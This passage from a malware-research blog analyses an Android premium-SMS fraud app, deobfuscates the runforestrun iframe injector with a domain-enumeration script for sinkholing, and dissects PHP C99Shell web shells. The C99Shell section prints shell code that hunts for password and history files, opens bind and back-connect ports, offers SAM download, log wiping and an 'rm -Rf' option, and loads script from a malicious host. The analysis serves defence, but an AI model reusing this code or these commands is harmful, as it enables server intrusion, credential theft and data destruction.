Figure 5 : Original Witness Picture

Figure 6 : Morphed Witness Picture

But Wait!! How does it matter with FruitNinja?

The main reason is that these "temp" files can change the application fingerprints, and eventually bypass traditional signature-based antivirus scanners by providing a different pattern. This is a classical AV bypass technique known as server-side polymorphism, found in many Windows-based malwares, and now it's been found in popular Android applications such as Instagram, Angry Birds, etc. Each time a user downloads the application, it creates a different, unique mutated version of the same file.

Analysis of Dalvik Executable File

Disassembling the dex file can be done in two ways:
1. Smali Assembler/Disassembler
2. Dex2Jar Converter

The Dex2jar converter is handier as it will generate a java archive (.jar file), which is basically the source code itself. From here on, we can use any Java decompiler to inspect the source code as shown in the figure below.

Figure 7: Java Decompiler

The first package in JD-GUI (Java Decompiler) shows the C2DM class, which is the Cloud to Device Messaging framework. C2DM is a service which provides a simple and lightweight mechanism that helps an application developer send data from a server to their applications. This service is usually used for application updates, but can also be used for malicious purposes such as maintaining Command and Control (C&C) servers.

The second package carries more malicious code. Notice the code at startSendMessages() as shown in the figure above. As expected, it is sending SMS to some numbers. But what is that number? And what is it trying to send? Let's probe further.

Figure 8: Building MCC Specific Text Message

While analyzing the program code, I noticed that the application is building certain text messages, as shown in figure 8 above, based on an xml file stored in the resource folder. The code checks for certain country codes (ID) here, such as Russian Federation (RF), Ukraine (UA), and Kazakhstan (KZ). It then sets the message depending on which country code is identified. What if the country code is not from any of these lists? Here, anything apart from these country codes will be set as Russian Federation by default.

When an Android program gets compiled, all these resource files get converted to binaries. Using the utility tool apktool, I decoded everything back to its original state (Figure 9).

Figure 9: Decoding using apktool

The converted xml file now looks as shown below (figure 10). A quick Google translation (to English) reveals it as an installation operation message.

Figure 10: Analyzing Parsed XML

Further analyzing the Actor class, I realized the application builds messages based on the Mobile Country Code (MCC) and the Mobile Network Code (MNC). The application validates the mobile country code of Russian Federation (RF), Kazakhstan (KZ) and Ukraine (UA) and the corresponding operator code.

Table1: MCC used by the Application

The pseudo code looks like below:

Figure 11 : SMS Fraud Code Logic

The application schedules some tasks (figure 12) such as setting up an alarm for checking the purchase of the application. If it is purchased, it will send only one SMS to the premium number. It sets the initial alarm time as 300000000+systemtime (in milliseconds), which means 83.33 hours after the application gets installed for the first time on the device.

Figure 12: Initial Settings

The scheduler checks for the license of the application once every 50000L+systemtime (in milliseconds), which is 50 seconds. Eventually the SMS count will get decreased as the application license gets renewed.

Figure 13: Schedule Checker

As the application continues running as the free version, the scheduler keeps checking the license and also keeps spying on the stored messages (figure 14), sending them to the preset number.

Figure 14: SMS Spying

Analyzing further (figure 15) on the number revealed that it belongs to a Russian company called PM-Invest Ltd. This website provides an online service for SMS fraud. They have a pool of premium numbers from which someone can purchase one, and if any of the infected users send a message to those numbers, the fraudster will get a certain commission from PM-Invest Ltd for each SMS.

Figure 15: Premium Number Tracked

Hence, the malware cycle functions as below:

1. The application gets access to the phone state and extracts MCC and MNC.
2. It then verifies and sets the corresponding premium number.
3. Builds the SMS format to be sent.
4. Checks the application's license to verify whether it is the evaluation version or a purchased one.
5. It checks the application license every 50 seconds, and decrements the SMS count if it is a purchased one and the license has renewed.
6. The application will send an SMS to the premium number once every 83.33 hours.

The following figure was taken from the fraudulent website which shows their tariff plans and how their system works.

Figure 16: SMS Fraudulent Site Tariff


The malware research analysis was done on the Android application to see the sophistication of real-world malware writers and the application internals. Though the legitimate application markets are trying to clean out all backdoored versions of applications, it was observed that some applications were still able to carry malicious code despite all the efforts to plug the loopholes. This may be attributable largely to Android's open and distributed development model. The following simple safeguards can help users avoid such serious infections.

Safeguards and General Precautions:

1. Avoid downloading applications from unknown 3rd party application stores.
2. Verify carefully what permissions are needed for each application.
3. Download applications from legitimate authors, especially famous applications, as they can be re-written by a malicious coder with an evil expectation of maximum infections.
4. Use anti-malware/monitoring programs and keep them updated regularly.




Sunday, October 7, 2012

[Updated] Fuzzy in Manual Cracking New PseudoRandom (JS/runforestrun?xxx=) Infector

Tired from lack of sleep after a weekend server deployment in the IDC, I arrived home and just joined the #MalwareMustDie hunting session. Somehow I found myself tracing the latest infections spread by the JS/runforestrun?xxx= infection, and found some new information which I don't think my usual pastebin info-sharing will be enough to express, so I am writing it in this blog.
I am half asleep writing this, so if I miss something please kindly forgive..


1. The research material (as per infected ITW/PseudoRandom sites data on Oct 5-6, 2012)

I found three types of obfuscation method, based on the original PseudoRandom or JS/runforestrun?xxx=, currently in the wild and actively infecting injectable HTML files on websites all over the internet. Please spare me and let's just call these types A, B, C:

Type A are the latest known URLs, which most detections show as JS/RunForest.C or JS/RunForest.C.1. The currently alive sample infection URLs are as below:

Type B is the URLs below, which some scanners show as JS/RunForest.Q
Type C is the URLs below, detected as: JS/RunForest.J
2. The fact that the obfuscation level is increasing a bit..

Type A uses new obfuscation code like below:

Which is uncrackable by automatic tools without modification.. PS: Malware names as per the check in VT(27/43)--->>[HERE]
MicroWorld-eScan         : Trojan.JS.Iframe.BTN
nProtect                 : Trojan.JS.Iframe.BTN
CAT-QuickHeal            : JS/BlacoleRef.BOP
McAfee                   : JS/
K7AntiVirus              : Trojan
F-Prot                   : JS/IFrame.QW
Norman                   : Blacole.JF
ESET-NOD32               : JS/Kryptik.QN
Avast                    : JS:Agent-ADY [Trj]
Kaspersky                :
BitDefender              : Trojan.JS.Iframe.BTN
Emsisoft                 : Exploit.JS.Blacole!IK
Comodo                   : TrojWare.JS.Agent.EGB
F-Secure                 : Trojan.JS.Iframe.BTN
VIPRE                    : Trojan.JS.Generic (v)
AntiVir                  : JS/RunForest.C.1
McAfee-GW-Edition        : Heuristic.BehavesLike.JS.Infected.G
Sophos                   : Mal/Iframe-AF
Jiangmin                 : Trojan/Script.Gen
Microsoft                : Trojan:JS/BlacoleRef.W
GData                    : Trojan.JS.Iframe.BTN
Commtouch                : JS/IFrame.QW
AhnLab-V3                : JS/Agent
Ikarus                   : Exploit.JS.Blacole
Fortinet                 : JS/Expack.VT!tr
AVG                      : Exploit

Type B looks like the code below:

<script>var var1=true;var var2=10;var2++;var var6=0.0025;if(var6=
ar5-=0.022;var var6=5685;var6--}var var5=57;var var8=0;do{var var
r var21=4053;if(var21>0.038){var var17=5470;var17--;var var20=22;
ar var32=8980;var32--}function hae(key,mir){var var34=0.031;if(va
r var42=0.009;var42+=0.004;var var43=0;var43+=0.003;var4+='cvCode
0;var53<10;var53++){var var54=null;var54-=0.0082}var3+='BjMxOfXg'
var6-=10;var var64=0.0079;var sux='0123456789ABCDEFGHIJKLMNOPQRST
tr[var1];var var76=0.032;for(var cnt1=0;cnt1<len;cnt1++){function
h);for(var var87=0;var87<5;var87++){var var88=0;var88+=0.008;var 
ar101-=0.0147;var var102=0.001;var102--}function man(and,qua){for
ar var8=4014;if(var8!=3947){var var4=21;if(var4!=0.0116){var var2
ar4=0.052;if(var4!=2753){var var2=true;var var3=['apt','gag']}ret
 var13=0.017;if(var13!=0){var var12=4296}}}}    var str='';functi
','has','ire'];var24++}while(var24<5);return zig}        str+=let
r26-=5819;var var27=0.003;var27++}}}var var31=[0,70,50,30,10,20,6
,got,nut){for(var var38=0;var38<9;var38++){var var39=8962;var39++
sr'+'c', 'h00p://'+domainName+'/in.cgi?14'); var var49=4490;var49'hidden'; var var58='YKtHrZfxVR';
↑The script is shown perfectly clear; all you have to do is figure out the domain name for it.. PS: Malware names as per the check in VT(9/43)--->>[HERE]
F-Secure                 : Trojan.Iframe.BDG
GData                    : Trojan.Iframe.BDG
AntiVir                  : JS/RunForest.Q
eScan                    : Trojan.Iframe.BDG
nProtect                 : Trojan.Iframe.BDG
BitDefender              : Trojan.Iframe.BDG
Ikarus                   : Trojan.IFrame

And type C looks like the one exposed in the previous post, written here ---->>[PREVIOUS-POST PSEUDO RANDOM]

3. Aggressive infection of PseudoRandom URLs, type A

Type A somehow aggressively came out of nowhere to infect sites with multiple infection URLs, using more than one pattern/structure.
Below is a real sample of one domain infected by the PseudoRandom aggressive infector:
(This is the #hint for our friends in #MalwareMustDie to dig deeper)

Pattern 1 (common ones)
Pattern 2 (longer ones with the encoded %E2%80%99 string, i.e. the curly apostrophe ’)
Pattern 3 - Repeatedly loops url-subdirs
↑These infected URLs don't look good at all, do they? Which makes me think it would be better to explain my poor way of cracking the Type A obfuscation, as written below, in the hope that some automation system can make the necessary adjustments..
[Additional] The Type A infection is aiming at vBulletin forum scripts. You can see the PoC details of this analysis in pastebin here--->>[HERE]

MANUAL DEOBFUSCATION METHOD (PSEUDO RANDOM DEOBFS SPECIFIC)

Let's take as an example the first URL shown above:
I fetched it from my FreeBSD box, hiding my credentials...
           => `index.html'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,742 (22K) [text/html]
22:28:13 (33.66 KB/s) - `index.html' saved [22742/22742]
The file inside looks like this Pastebin --->>[HERE] ..looks nice & long.. Running this URL in "browser logic" may end up with a log like this:
[h00p] URL: h00p://www・ (Status: 200, Referrer: None)
<meta content="0; URL=site/" http-equiv="Refresh"/>
[Navigator URL Translation] site/ -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 200, Referrer: h00p://www・
[h00p Redirection (Status: 302)] Content-Location: h00p://www・ --> Location: h00p://www・
[Navigator URL Translation] site/ -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 200, Referrer: h00p://www・
[h00p Redirection (Status: 302)] Content-Location: h00p://www・ --> Location: h00p://www・
<object align="" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="h00p://
ockwave/cabs/flash/,0,0,0" height="250" id="thaflash" style="z-index:1" width="500">
                <param name="wmode" value="transparent"></param>
                <param name="movie" value="default.swf"></param>
                <param name="quality" value="high"></param>
                <param name="Scale" value="ShowAll"></param>
                                <param name="wmode" value="opaque"></param>
                                <param name="FlashVars" value="BackgroundId=1&ObjectId=1&!+"></param>
                <embed align="" bgcolor="#ffffff" flashvars="BackgroundId=1&ObjectId=1&!+" height="250" name="thaflash" pluginspage="h00p://www・" quality="high" src="default.swf" type="application/x-shockwave-flash" width="500" wmode="opaque"></embed>
[Shellcode Analysis] URL Detected: h00p://,0,0,0
[h00p] URL: h00p://,0,0,0 (Status: 200, Referrer: h00p://www・
[h00p Redirection (Status: 302)] Content-Location: h00p://
b#version=7,0,0,0 --> Location: h00p://
Saving remote content at h00p://,0,0,0 (MD5: 97e6d7379f4fab31df4f89fec878765d)
ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta name="KEYWORDS"/>
<meta name="DESCRIPTION"/>
<meta content="Parallels Plesk Sitebuilder 4.5 for Windows" name="GENERATOR"/>
[Meta] Generator: Parallels Plesk Sitebuilder 4.5 for Windows
<param name="wmode" value="transparent"></param>
<param name="movie" value="default.swf"></param>
[Navigator URL Translation] default.swf -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 404, Referrer: h00p://www・
FileNotFoundError: h00p://www・
<param name="quality" value="high"></param>
<param name="Scale" value="ShowAll"></param>
<param name="wmode" value="opaque"></param>
<param name="FlashVars" value="BackgroundId=1&ObjectId=1&!+"></param>
<embed align="" bgcolor="#ffffff" flashvars="BackgroundId=1&ObjectId=1&!+" height="250" name="thaflash" pluginspage="h00p://www・" quality="high" src="default.swf" type="application/x-shockwave-flash" width="500" wmode="opaque"></embed>
[Navigator URL Translation] default.swf -->  h00p://www・
[h00p] URL: h00p://www・ (Status: 404, Referrer: h00p://www・
FileNotFoundError: h00p://www・
[Window] Eval argument length > 64 (7413)
[Window] Eval argument length > 64 (1776)
↑which makes you think that no infection happened... While if you look closely at the deobfuscated code you'll be about 99% sure that malware did these injections. So.. we should CRACK it, manually.
Deobfuscating stuff like this is faster to do offline: use any SpiderMonkey-based JavaScript emulator to see the flow, play with the strings that cannot be run and change them to whatever variable is accepted, and with luck you'll come to the first deobfuscation level like this ---->>[HERE] The upper one is the one-line code resulting from the deobfuscation and the next part is the readable format of it.
So we have another deobfuscation level; let's crack it again and you'll get the PseudoRandom code like this --->>[HERE]
So we know this is the PseudoRandom code now; to get to the payload, just solve the code.. The key is in the randomized domain as coded in the IFRAME part, in this line↓
ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); 
If we get the var domainName then we can sleep soon! This is my trick, the easy way: change the IFRAME part to look like this:
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            document.write(domainName); //←THIS IS ADDED!!!
//            ifrm = document.createElement("IFRAME"); 
//            ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); 
//   = "0px"; 
//   = "0px"; 
//   = "hidden"; 
//            document.body.appendChild(ifrm);
1. Remove all functions related to the browser object.
2. Comment out the ifrm object, and focus on the result of domainName by feeding it directly to generatePseudoRandomString.
3. Use the document.write command to burp out domainName's value.
Below is my deobfs tool, a proof of burping the domain name: The code resulted in , which gives the malicious URL used in the malicious IFRAME:
1. If you use jsunpack, it cracks only the first level of the code..
2. If you use ****wet for example, it will freeze, so don't do it until they update the engine to avoid the freezing..
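The document.write trick above gets you one domain, in a browser, for the moment you run it. As an added example (not code from this post, and not the injector's own code) here is the same idea done headlessly in Node.js and extended to enumerate the domains coming up, which is what you need for registering and sinkholing them. The Park-Miller constants, the seed formula built from month, day of month and half-day, and the a-z alphabet are illustrative assumptions modelled on the shape of this family; when you use it on a real case, substitute the bodies of RandomNumberGenerator, nextRandomNumber and generatePseudoRandomString recovered from your own deobfuscated sample. The runforestrun?sid=botnet2 URL format is the one shown in the IFRAME line above.

```javascript
// Added example, not the injector's code: a time-seeded domain generator of the
// shape used by the PseudoRandom / runforestrun family, the "burp the domain"
// trick done without a browser, and an enumerator for sinkholing.
// ASSUMPTIONS: the Park-Miller constants, the seed formula and the a-z alphabet
// are illustrative; take the real ones from your deobfuscated sample.

const M = 2147483647;          // 2^31 - 1, Lehmer modulus (assumed)
const A = 48271;               // Lehmer multiplier (assumed)
const Q = Math.floor(M / A);   // Schrage split: keeps every product < 2^53
const R = M % A;

class DateSeededRng {
  // Seed from month, day of month and half of the day only, so every visitor
  // in the same half-day resolves the same domain. The injector reads the
  // victim's *local* clock; useUtc=true just makes the output reproducible.
  constructor(unix, useUtc = true) {
    const d = new Date(unix * 1000);
    const month = useUtc ? d.getUTCMonth() : d.getMonth();
    const day = useUtc ? d.getUTCDate() : d.getDate();
    const hours = useUtc ? d.getUTCHours() : d.getHours();
    const half = hours > 12 ? 1 : 0;
    const seed = (2345678901 + month * 0xFFFFFF + day * 0xFFFF + half * 0xFFF) % M;
    this.seed = seed === 0 ? 1 : seed;    // Lehmer state must stay in [1, M-1]
  }

  // One Lehmer step via Schrage's method; returns a float in (0, 1).
  next() {
    const hi = Math.floor(this.seed / Q);
    const lo = this.seed % Q;
    const test = A * lo - R * hi;
    this.seed = test > 0 ? test : test + M;
    return this.seed / M;
  }
}

// Same signature the injector uses: generatePseudoRandomString(unix, 16, 'ru').
function generatePseudoRandomString(unix, length, zone, useUtc = true) {
  const rng = new DateSeededRng(unix, useUtc);
  const letters = 'abcdefghijklmnopqrstuvwxyz';
  let name = '';
  for (let i = 0; i < length; i++) {
    name += letters[Math.floor(rng.next() * letters.length)];
  }
  return name + '.' + zone;
}

// The document.write(domainName) trick as a function: report the domain and the
// IFRAME src the script would have built, without building any IFRAME.
function resolveIframeTarget(unix, useUtc = true) {
  const domainName = generatePseudoRandomString(unix, 16, 'ru', useUtc);
  return { domainName, url: 'http://' + domainName + '/runforestrun?sid=botnet2' };
}

// Walk `days` days forward from startUnix (snapped to midnight UTC when
// useUtc), probe both halves of each day, and return the distinct domains:
// the list to pre-register / sinkhole.
function enumerateDomains(startUnix, days, useUtc = true) {
  const base = useUtc ? startUnix - (startUnix % 86400) : startUnix;
  const seen = new Set();
  for (let d = 0; d < days; d++) {
    for (const hour of [6, 18]) {   // one probe per half-day is enough
      seen.add(generatePseudoRandomString(base + d * 86400 + hour * 3600, 16, 'ru', useUtc));
    }
  }
  return [...seen];
}

// Stand-alone run: the domain a victim visiting right now would be sent to.
console.log(resolveIframeTarget(Math.floor(Date.now() / 1000)).domainName);
```

Two things to keep in mind when you turn this into a sinkhole list: the real script calls getMonth/getDate/getHours on the victim's local clock, so the same instant can resolve to different domains in different time zones (run it with useUtc=false from each zone you care about, or shift the timestamps yourself); and because the seed depends only on month, day and half-day, there are at most two domains per day, which is why brute-forcing the rest of the year is cheap.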
!!NEW!! Additional - PseudoRandom Logic Cracking #Tool With the team effort in #MalwareMustDie, and the contribution of anonymous researchers, we are releasing the template to crack JS/Runforrest a.k.a. PseudoRandom with the "neutralized" source code below, which can be used as the ultimate code to crack the PseudoRandom infected target URL; we call it the "F*ck the dumbass" script :-)

F*ck the dumbass

HOW TO USE this tool:
1. Copy this code locally and save it as an HTML file.
2. Edit the contents of the functions generatePseudoRandomString, RandomNumberGenerator, and nextRandomNumber with the values you got during de-obfuscation.
3. Run the HTML locally in your browser like the screenshot below: ↑And click that button.
4. The tool will calculate the time-based random value and burp you the current value immediately, as per the snapshot below:
5. For an online demonstration of this tool, you can safely TRY it here--->>[ToolOnlineURL]
6. Crusader's log:
7. A bruteforce method for the latest detected PseudoRandom can be viewed here-->>[HERE] These domains can be registered AND sinkholed to prevent the next infections. Contributed in the #MalwareMustDie session by @EricOpdyke :
8. The W****et #BUG in analyzing the current sample was reported in public after being tweeted directly by the developer member, as per:


Monday, October 1, 2012

How EVIL the PHP/C99Shell can be? From SQL Dumper, Hacktools, to Trojan Distributor Future?

*) This post is dedicated to MalwareMustDie loyal friends!

Maybe some of you read our previous blog (HERE) where we cracked the last encrypted code used by the Pbot malware gang.
Recently we've been on Exploit Kits, but during the last hunt we had in #MalwareMustDie, the sniper team aimed at a different infector vector. For example, in a previous blog (HERE) we nailed a Shanghai Chinese individual who spread Online Game Trojan infectors using an exploit for CVE-2012-1889.
BUT.. the fun of the week was actually when our sniper spotted the rising infections of PHP/C99Shell malware! :-)
Our members cracked and exposed some cases from URLs between Sept 28th and 30th regarding PHP/C99Shell. YES, PHP/C99Shell might not be on the AntiVirus companies' FIRST agenda, but this threat actually does the bigger damage to servers, so we think you should know what we found. These were interesting findings, including some IMPORTANT information, so here we go!
PS: We're not going to expose them one by one (actually we did 12 cases of these), but we categorized them into 3 (three) interesting cases:

TYPE #1 - An SQL Database Dumper of PHP/C99Shell 

We found it here: (still up, so you can check it out), yesterday's log:
--16:05:18--  h00p://     => `asd.jpg'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,234 (43K) [image/jpeg]
What looks like an image is actually a PHP script; it has obfuscation like below....
Which says "eval(gzinflate(base64_decode"; if you run it in any PHP environment you'll get the eval'ed code, as shown in the neutralized code here:--->>[PASTEBIN] (safer: swap the outer eval for echo, or decode the gzinflate/base64 layers statically, so the shell itself never runs). The version and source URL can be seen below:
 $shver = "2.0 madnet edition";
 if (empty($surl))
   $surl = $_SERVER['PHP_SELF'];
 $surl = htmlspecialchars($surl);
 $timelimit = 0;
 $host_allow = array("*");
 $login_txt = "Admin area";
 $accessdeniedmess = "<a href=\"h00p://\">c99madshell v.".$shver."</a>: access denied";
 $gzipencode = TRUE;
 $c99sh_sourcesurl = "h00p://";
Binding to these ports:
 $bindport_port = "31373";
 $bc_port = "31373";
 $datapipe_localport = "8081";
A nice interface will come up: it practically hacks the compromised system, like the snip below: current dir files, PHP config, web .htaccess & shell data exposed..
   array("find all suid files", "find / -type f -perm -04000 -ls"),  
   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),  
   array("find all sgid files", "find / -type f -perm -02000 -ls"),  
   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),  
   array("find files", "find / -type f -name"),  
   array("find config* files", "find / -type f -name \"config*\""),  
   array("find config* files in current dir", "find . -type f -name \"config*\""),  
   array("find all writable folders and files", "find / -perm -2 -ls"),  
   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),  
   array("find all service.pwd files", "find / -type f -name service.pwd"),  
   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),  
   array("find all .htpasswd files", "find / -type f -name .htpasswd"),  
   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),  
   array("find all .bash_history files", "find / -type f -name .bash_history"),  
   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),  
   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),  
   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),  
   array("list file attributes on a Linux second extended file system", "lsattr -va"),  
   array("show opened ports", "netstat -an | grep -i listen") );
It can remotely inspect your server's file permissions via the Web GUI:
$owner["read"] = ($mode & 00400)?"r":"-";
$owner["write"] = ($mode & 00200)?"w":"-";
$owner["execute"] = ($mode & 00100)?"x":"-";
$group["read"] = ($mode & 00040)?"r":"-";
$group["write"] = ($mode & 00020)?"w":"-";
$group["execute"] = ($mode & 00010)?"x":"-";
$world["read"] = ($mode & 00004)?"r":"-";
$world["write"] = ($mode & 00002)? "w":"-";
$world["execute"] = ($mode & 00001)?"x":"-";
$o["r"] = ($mode & 00400) > 0;
$o["w"] = ($mode & 00200) > 0;
$o["x"] = ($mode & 00100) > 0;
$g["r"] = ($mode & 00040) > 0;
$g["w"] = ($mode & 00020) > 0;
$g["x"] = ($mode & 00010) > 0;
$w["r"] = ($mode & 00004) > 0;
$w["w"] = ($mode & 00002) > 0;
$w["x"] = ($mode & 00001) > 0;
SQL dumps (if there is any database..)
function mysql_dump($set)
{ global $shver;
  $sock = $set["sock"];
  $db = $set["db"];
  $print = $set["print"];
  $nl2br = $set["nl2br"];
  $file = $set["file"];
  $add_drop = $set["add_drop"];
  $tabs = $set["tabs"];
  $onlytabs = $set["onlytabs"];
  $ret = array();
  $ret["err"] = array();
$out = "# Dumped by C99madShell.SQL v. ".$shver."
# Home page: 
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")
# Date: ".date("d.m.Y H:i:s")."
# DB: \"".$db."\"
#---------------------------------------------------------
";
$c = count($onlytabs);
foreach($tabs as $tab)
The detection ratio of this mess is as below on VT:
MD5: 8b459895a539e944ed2fd07a518c93fe
File size: 43.2 KB ( 44234 bytes )
File name: asd.jpg
File type: PHP
Tags: php
Detection: 15 / 33
Analysis date: 2012-09-29 15:21:52 UTC ( 1 day, 16 hours ago )
URL:--------->>[VirusTOTAL]
TYPE #2 - An injected/hacked html with the PHP/C99Shell

Most PHP/C99Shell implants are on sites whose FTP credentials were leaked, or on PHP/FTP/CMS sites having a remote file inclusion or arbitrary file upload flaw. It's rare, but cases like Exploit Kit injection code inside the existing HTML were also found. Below is the case:
--16:50:13--  hp://
           => `About-the-UAE.html'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
16:50:18 (73.24 KB/s) - `About-the-UAE.html' saved [190110]
We neutralized the code of this page so you can see it here-->>[PASTEBIN]
A snip of the PHP/C99Shell code, which starts in the middle of the HTML: It has a nice GUI too, like this: With the evil functions below: The backdoor: (see the decoded URL parts)...
if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; 
foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); 
$name = urldecode($v[0]); $value = urldecode($v[1]); 
foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) 
{if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} 
if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$k1r4_updateurl = "h00p://"; //Update server
$k1r4_sourcesurl = "h00p://"; //Sources-server
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "k1r4";  // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
Aiming at Windows OS too....
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
;-) accidentally saw the actor's contacts:
$log_email = ""; //Default e-mail for sending logs
These are the file type definitions used by this malware:
Main menu functions (Encoder, Tools, ProcessID, FTP Brute, SQL Dump, Bot Update, SelfRemove..)
array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
array("<b>Self remove</b>",$surl."act=selfremove"),
array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
Like the previous one, it has the same functions, but this one uses a cookie as one of its security measures..
 global $sess_data;
 $sess_data = $data;
 $data = serialize($data);
It used obfuscation too:
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052
leads to..
<SCRIPT SRC=h00p://www.shellci・biz/yazciz/ciz.js></SCRIPT>
Starting from line 1089 you'll see the SQL data dumping: hacking/using your own SQL database tables to dump them and access them remotely...
?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
All of these are WebGUI-based operations, amazing! Server status (also via the WebGUI):
$acts = array("","newdb","serverstatus","servervars","processes","getfile");
if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><   
ion="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input typ   
en" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
echo "<center><b>Processes:</b><br><br>";
echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 bor     
Here goes your unix server's system information...
 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
 displaysecinfo("Distrib name",myshellexec("cat /etc/"));
 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
 displaysecinfo("RAM",myshellexec("free -m"));
 displaysecinfo("HDD space",myshellexec("df -h"));
 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
 displaysecinfo("Is links installed?",myshellexec("which links"));
 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
 displaysecinfo("Is GET installed?",myshellexec("which GET"));
 displaysecinfo("Is perl installed?",myshellexec("which perl"));
 displaysecinfo("Where is apache",myshellexec("whereis apache"));
 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));}
Seems your WinNT passwords cannot be cracked by this shell :-)
  $v = $_SERVER["WINDIR"]."\repair\sam";
  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
System password breach, disk eraser, log wiper, kernel attack...
<OPTION VALUE="uname -a">Kernel version
<OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
<OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
<OPTION VALUE="which wget curl w3m lynx">Downloaders?
<OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
<OPTION VALUE="netstat -atup | grep IST">Open ports
<OPTION VALUE="locate gcc">gcc installed?
<OPTION VALUE="rm -Rf">Format box (DANGEROUS)
<OPTION VALUE="wget">WIPELOGS PT1 (If wget installed)
WIPELOGS PT2
